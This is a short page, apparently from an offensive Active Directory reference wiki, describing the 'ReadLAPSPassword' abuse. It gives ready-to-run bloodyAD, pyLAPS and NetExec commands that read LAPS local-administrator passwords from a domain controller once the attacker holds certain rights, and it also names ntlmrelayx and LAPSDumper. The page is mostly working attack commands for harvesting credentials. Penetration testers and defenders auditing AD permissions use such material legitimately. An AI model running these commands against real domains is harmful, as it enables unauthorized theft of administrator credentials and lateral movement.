ReadLAPSPassword
This abuse can be carried out when controlling an object that has GenericAll
or AllExtendedRights
(or combination of GetChanges
and (GetChangesInFilteredSet
or GetChangesAll
) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
Alternative #1: Using bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Alternative #2: pyLAPS (Python)
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
Alternative #3: NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.
# Default command
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps
.
Alternative #4: LAPSDumper is another Python alternative.
Last updated
Was this helpful?